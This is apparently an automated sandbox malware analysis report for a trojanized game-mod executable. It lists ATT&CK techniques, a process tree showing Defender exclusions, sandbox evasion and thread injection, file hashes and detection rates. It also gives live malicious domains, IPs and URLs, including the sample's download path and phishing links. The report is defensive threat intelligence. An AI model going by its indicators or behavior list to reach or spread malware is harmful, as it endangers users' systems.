      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
      Virtualization/Sandbox Evasion      		DCSync2
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation      		Proc Filesystem1
      Application Window Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Bootkit      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445527 Sample: mav17final.exe Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 100 gta5modmenufree.com 2->100 108 Multi AV Scanner detection for domain / URL 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 Multi AV Scanner detection for submitted file 2->112 114 5 other signatures 2->114 11 mav17final.exe 20 2->11         started        15 dialer.exe 2->15         started        17 svchost.exe 2->17         started        signatures3 process4 file5 90 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->90 dropped 92 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 11->92 dropped 94 C:\Users\user\AppData\Local\...\python311.dll, PE32+ 11->94 dropped 98 14 other malicious files 11->98 dropped 134 Contains functionality to infect the boot sector 11->134 136 Adds a directory exclusion to Windows Defender 11->136 19 mav17final.exe 2 11->19         started        96 C:\Windows\Temp\ujjtjyeszdwn.sys, PE32+ 15->96 dropped 138 Multi AV Scanner detection for dropped file 15->138 140 Machine Learning detection for dropped file 15->140 142 Modifies the context of a thread in another process (thread injection) 15->142 144 2 other signatures 15->144 23 powershell.exe 15->23         started        25 dwm.exe 15->25         started        28 cmd.exe 15->28         started        30 10 other processes 15->30 signatures6 process7 dnsIp8 86 C:\Users\user\AppData\Local\Temp\dialer.exe, PE32+ 19->86 dropped 116 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->116 118 Adds a directory exclusion to Windows Defender 19->118 32 cmd.exe 1 19->32         started        34 cmd.exe 1 19->34         started        120 Loading BitLocker PowerShell Module 23->120 37 conhost.exe 23->37         started        102 77.105.166.179, 49704, 49706, 7752 ICOMF-ASRU Russian Federation 25->102 104 gta5modmenufree.com 188.114.96.3, 443, 49705 CLOUDFLARENETUS European Union 25->104 122 Query firmware table information (likely to detect VMs) 25->122 39 conhost.exe 28->39         started        41 wusa.exe 28->41         started        43 conhost.exe 30->43         started        45 conhost.exe 30->45         started        47 conhost.exe 30->47         started        49 6 other processes 30->49 file9 signatures10 process11 signatures12 51 dialer.exe 1 1 32->51         started        55 conhost.exe 32->55         started        106 Adds a directory exclusion to Windows Defender 34->106 57 powershell.exe 22 34->57         started        59 conhost.exe 34->59         started        process13 file14 88 C:\ProgramData\dialer.exe, PE32+ 51->88 dropped 124 Multi AV Scanner detection for dropped file 51->124 126 Machine Learning detection for dropped file 51->126 128 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 51->128 132 3 other signatures 51->132 61 powershell.exe 23 51->61         started        64 cmd.exe 1 51->64         started        66 powercfg.exe 1 51->66         started        68 12 other processes 51->68 130 Loading BitLocker PowerShell Module 57->130 signatures15 process16 signatures17 146 Loading BitLocker PowerShell Module 61->146 70 conhost.exe 61->70         started        72 conhost.exe 64->72         started        74 wusa.exe 64->74         started        76 conhost.exe 66->76         started        78 conhost.exe 68->78         started        80 conhost.exe 68->80         started        82 conhost.exe 68->82         started        84 9 other processes 68->84 process18

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      mav17final.exe34%ReversingLabsWin64.Trojan.Generic
      mav17final.exe16%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\dialer.exe100%Joe Sandbox ML
      C:\ProgramData\dialer.exe100%Joe Sandbox ML
      C:\ProgramData\dialer.exe79%ReversingLabsWin64.Trojan.Zusy
      C:\ProgramData\dialer.exe65%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\dialer.exe79%ReversingLabsWin64.Trojan.Zusy
      C:\Users\user\AppData\Local\Temp\dialer.exe65%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      gta5modmenufree.com5%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%URL Reputationsafe
      http://cacerts.digicert.co0%URL Reputationsafe
      https://www.python.org/download/releases/2.3/mro/.0%URL Reputationsafe
      https://www.openssl.org/H0%URL Reputationsafe
      http://www.iana.org/time-zones/repository/tz-link.html0%URL Reputationsafe
      http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
      https://peps.python.org/pep-0205/0%URL Reputationsafe
      http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm0%URL Reputationsafe
      https://peps.python.org/pep-0263/0%URL Reputationsafe
      https://www.python.org/psf/license/0%URL Reputationsafe
      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
      https://github.com/giampaolo/psutil/issues/875.0%Avira URL Cloudsafe
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
      https://stackoverflow.com/questions/4457745#44577450%Avira URL Cloudsafe
      http://mail.python.org/pipermail/python-dev/2012-June/120787.html0%Avira URL Cloudsafe
      http://goo.gl/zeJZl0%Avira URL Cloudsafe
      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%VirustotalBrowse
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
      https://stackoverflow.com/questions/4457745#44577450%VirustotalBrowse
      https://gta5modmenufree.com/CSHQRtZu/standingcpu0%Avira URL Cloudsafe
      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
      https://github.com/giampaolo/psutil/issues/875.0%VirustotalBrowse
      http://goo.gl/zeJZl0%VirustotalBrowse
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%VirustotalBrowse
      http://mail.python.org/pipermail/python-dev/2012-June/120787.html0%VirustotalBrowse
      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%VirustotalBrowse
      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      gta5modmenufree.com
      		188.114.96.3
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://gta5modmenufree.com/CSHQRtZu/standingcpufalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64mav17final.exe, 00000002.00000003.2041722275.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046833551.00000187176AB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2045701458.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2033297099.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046317483.00000187176AA000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052090144.00000187176AC000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2064361091.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052889217.00000187176B2000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2050639413.0000018717883000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688mav17final.exe, 00000002.00000002.2062169744.0000018717208000.00000004.00001000.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://cacerts.digicert.comav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://github.com/giampaolo/psutil/issues/875.mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://www.python.org/download/releases/2.3/mro/.mav17final.exe, 00000002.00000002.2062169744.0000018717180000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992629255.000001871762E000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://mail.python.org/pipermail/python-dev/2012-June/120787.htmlmav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://stackoverflow.com/questions/4457745#4457745mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readermav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://www.openssl.org/Hmav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.iana.org/time-zones/repository/tz-link.htmlmav17final.exe, 00000002.00000003.1995336796.000001871785B000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://goo.gl/zeJZlmav17final.exe, 00000002.00000003.1996191490.0000018717925000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlmav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://peps.python.org/pep-0205/mav17final.exe, 00000002.00000002.2066729753.0000018718CBC000.00000004.00001000.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#mav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pymav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmmav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718C38000.00000004.00001000.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_symav17final.exe, 00000002.00000003.2046884562.0000018715958000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992798977.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046367139.0000018715944000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062065450.000001871595F000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054589272.000001871595A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1991499161.000001871596A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2059550410.000001871595C000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://peps.python.org/pep-0263/mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://www.python.org/psf/license/mav17final.exe, 00000002.00000002.2069042978.00007FF8A8D88000.00000004.00000001.01000000.00000004.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      188.114.96.3
      		gta5modmenufree.comEuropean Union
      		13335CLOUDFLARENETUSfalse
      77.105.166.179
      		unknownRussian Federation
      		43176ICOMF-ASRUfalse

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1445527
      Start date and time:2024-05-22 06:45:11 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 9m 57s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:70
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:mav17final.exe
      Detection:MAL
      Classification:mal100.spyw.evad.mine.winEXE@100/36@1/2
      EGA Information:
      • Successful, ratio: 66.7%
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .exe

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target dialer.exe, PID 3664 because it is empty
      • Execution Graph export aborted for target dialer.exe, PID 6204 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      00:45:58API Interceptor40x Sleep call for process: powershell.exe modified
      00:46:01API Interceptor1x Sleep call for process: dialer.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.96.3ARRIVAL NOTICE.docGet hashmaliciousLokibotBrowse
      • spencerstuartllc.top/evie2/five/fre.php
      Scan9430654.exeGet hashmaliciousFormBookBrowse
      • www.nifadofa.homes/38gc/
      Inventory_list.xlsGet hashmaliciousUnknownBrowse
      • i8.ae/cGrnN
      ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
      • dokdo.in/pYI
      Inventory_list.xlsGet hashmaliciousUnknownBrowse
      • i8.ae/cGrnN
      file.exeGet hashmaliciousFormBookBrowse
      • www.huangpositive.site/bm6n/?8n=aAoejwWZFiCrfGqPBHj/m2/PxsdJwEc8tlnUGzKrzo1wpFIxo6POt5lRkeHtIuPuWQTQkS0T8WndeVqc1/AEe5wUm02jzsi98TQJhoA5iu/rECfyrNm2TAw=&xnjD=N4Pdr
      PHARMACEUTICAL ORDER.xlsGet hashmaliciousUnknownBrowse
      • dokdo.in/zQz
      PON2401071.xlsGet hashmaliciousUnknownBrowse
      • dokdo.in/wcg
      file.exeGet hashmaliciousFormBookBrowse
      • www.huangpositive.site/bm6n/
      PON2401071.xlsGet hashmaliciousUnknownBrowse
      • dokdo.in/wcg
      77.105.166.179Arceus.exeGet hashmaliciousXmrigBrowse

        Domains

        No context

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSMaersk-BL-Ref0929339041333 47367282378722.scrGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        https://gw2lm63127.eleteriod.com/j2qv060236/#dG9tQGZpbHRlcnNwbHVzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
        • 104.17.2.184
        https://url6.mailanyone.net/scanner?m=1s9UFM-000CiC-67&d=4%7Cmail/90/1716316200/1s9UFM-000CiC-67%7Cin6e%7C57e1b682%7C26023477%7C10839452%7C664CE828D09A29E749862A491AAAC3E1&o=/phta:/ptspbinrllytaonozz.c.oeigc/a&s=IY823YGYdPj0VexD71Fh81X9-uMGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
        • 104.17.2.184
        NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
        • 172.67.190.203
        Tsl _ Tuesday May 2024..rtfGet hashmaliciousHTMLPhisherBrowse
        • 188.114.97.3
        Tsl _ Tuesday May 2024..rtfGet hashmaliciousHTMLPhisherBrowse
        • 104.17.2.184
        http://msserver365.folletos.euGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
        • 104.17.2.184
        SOA APR 24.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        https://url.au.m.mimecastprotect.com/s/mjsWCGv0k9hBOJLgS7iTae?domain=login.websonnsenndshares-pages.onlineGet hashmaliciousUnknownBrowse
        • 104.17.2.184
        http://sallywilliamson.com/Get hashmaliciousUnknownBrowse
        • 104.17.31.174
        ICOMF-ASRURxGB5U5XHX.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 77.105.161.254
        wnUwGBR8uK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 77.105.161.254
        mE6cY5Lf5f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 77.105.161.180
        Arceus.exeGet hashmaliciousXmrigBrowse
        • 77.105.166.179
        0sE5N2driQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 77.105.161.254
        URKhkNRquh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 77.105.161.254
        SecuriteInfo.com.Linux.Siggen.9999.4259.32315.elfGet hashmaliciousUnknownBrowse
        • 77.105.163.9
        OMYZQMamB0.elfGet hashmaliciousUnknownBrowse
        • 77.105.163.9
        fgtt2yjapn.elfGet hashmaliciousUnknownBrowse
        • 77.105.163.9
        WLFUgfqVkO.elfGet hashmaliciousUnknownBrowse
        • 77.105.163.9

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pydfile.exeGet hashmaliciousUnknownBrowse
          access_version_x32-64_pack.exeGet hashmaliciousUnknownBrowse
            https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
              Wave32bit.exeGet hashmaliciousUnknownBrowse
                Wave32bit.exeGet hashmaliciousUnknownBrowse
                  DeltaX.exeGet hashmaliciousXmrigBrowse
                    Arceus.exeGet hashmaliciousXmrigBrowse
                      DeltaX.exeGet hashmaliciousXmrigBrowse
                        W1dMSoIHTz.exeGet hashmaliciousUnknownBrowse
                          W1dMSoIHTz.exeGet hashmaliciousUnknownBrowse
                            C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dllfile.exeGet hashmaliciousUnknownBrowse
                              SecuriteInfo.com.Win64.SpywareX-gen.27721.19030.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                access_version_x32-64_pack.exeGet hashmaliciousUnknownBrowse
                                  https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
                                    Wave32bit.exeGet hashmaliciousUnknownBrowse
                                      Wave32bit.exeGet hashmaliciousUnknownBrowse
                                        DeltaX.exeGet hashmaliciousXmrigBrowse
                                          Arceus.exeGet hashmaliciousXmrigBrowse
                                            DeltaX.exeGet hashmaliciousXmrigBrowse
                                              SecuriteInfo.com.FileRepMalware.5539.23420.exeGet hashmaliciousUnknownBrowse

                                                Created / dropped Files

                                                C:\ProgramData\dialer.exe

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\dialer.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5290264
                                                Entropy (8bit):6.532307554125056
                                                Encrypted:false
                                                SSDEEP:98304:CoTBOZ1ed7R/gyE5hIblWsTvMq/tjafGriRNUP8lw:CoTBOvayyE3IblWKPljafGDaw
                                                MD5:0BCBEA7313655A42ECC0A1FDBCF37993
                                                SHA1:4262E7F1A051C50C0145CE932EC261E6B93F387E
                                                SHA-256:B63F00D14E4EDC4A5B63E48D3836DA41D3567BBEACB84322B054DD5B2A25A600
                                                SHA-512:11D99F7E31E65A3A0E2C63AAA9F0476EF3835BBBB96181043A642AC11503E7DA3DED331E5FD0F5D4A66951F674C14B6693434DE337B35ED77AFE0E21D49B3B7E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 79%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Gf.........."...........O.....@..........@..............................Q...........`.....................................................<.............P.......P..)....Q.h...............................(.......8............................................text...f........................... ..`.rdata..|B.......D..................@..@.data.....O.......O.................@....pdata........P.......P.............@..@.00cfg........P.......P.............@..@.tls..........P.......P.............@....reloc..h.....Q.......P.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                Category:dropped
